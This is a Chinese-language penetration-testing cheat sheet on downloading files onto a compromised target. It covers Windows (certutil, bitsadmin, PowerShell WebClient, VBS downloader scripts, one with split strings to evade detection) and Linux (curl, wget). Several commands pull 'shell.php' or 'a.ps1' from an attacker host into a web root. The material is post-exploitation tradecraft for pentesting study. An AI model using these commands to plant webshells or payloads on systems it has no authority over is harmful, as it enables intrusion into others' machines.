文件下载

(Updated: )

文件下载

前言

对于渗透测试来说,当我们拿到的目标权限过低,会很难进行下一步动作,便需要使用其他利器继续进行提权等操作,当需要将文件下载到目标机器时,就会用到文件下载命令。

Windows

0x00 certutil

certutil.exe是一个命令行工具,作为Windows server 2003家族证书服务的一部分安装。

命令详解

certutil -urlcache -split -f http://192.168.72.10/shell.php

将shell.php下载当当前目录

该命令适用于 server 2003以上版本

0x01 bitsadmin

BITSAdmin是一个命令行工具,可用于创建下载或上传作业并监视其进度。

命令详解

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.72.10/shell.php" "E:\phpstudy_pro\WWW\shell.php"

将shell.php下载到E:\phpstudy_pro\WWW\目录

该命令适用于win 7以上版本

0x02 powersehll

命令详解

1
powershell(new-object Net.WebClient).DownloadFile('http://192.168.72.10/shell.php','E:\phpstudy_pro\WWW\shell.php')

将shell.php脚本下载到当前目录

该命令适用于server 2003以上版本

0x03 vbs

  • 第一种
1
2
3
4
5
6
7
8
9
10
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >>download.vbs

把下载地址直接echo输入download.vbs。直接下载即可

该命令适用于server 2003以上版本

  • 第二种
1
2
# echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs
# cscript downfile.vbs http://192.168.203.140/a.ps1 D:\\tomcat8.5\\webapps\\x.ps1

保存脚本后再下载指定文件

该命令适用于server 2003以上版本

Linux

0x00 curl

基本用法

1
# curl http://www.linux.com

执行后,www.linux.com 的html就会显示在屏幕上了

保存访问的网页

1
# curl http://www.linux.com >> linux.html
1
# curl -o linux.html http://www.linux.com

0x01 wget

1
# wget -p /etc http://192.168.72.10/shell.php

下载文件到 /etc 文件夹下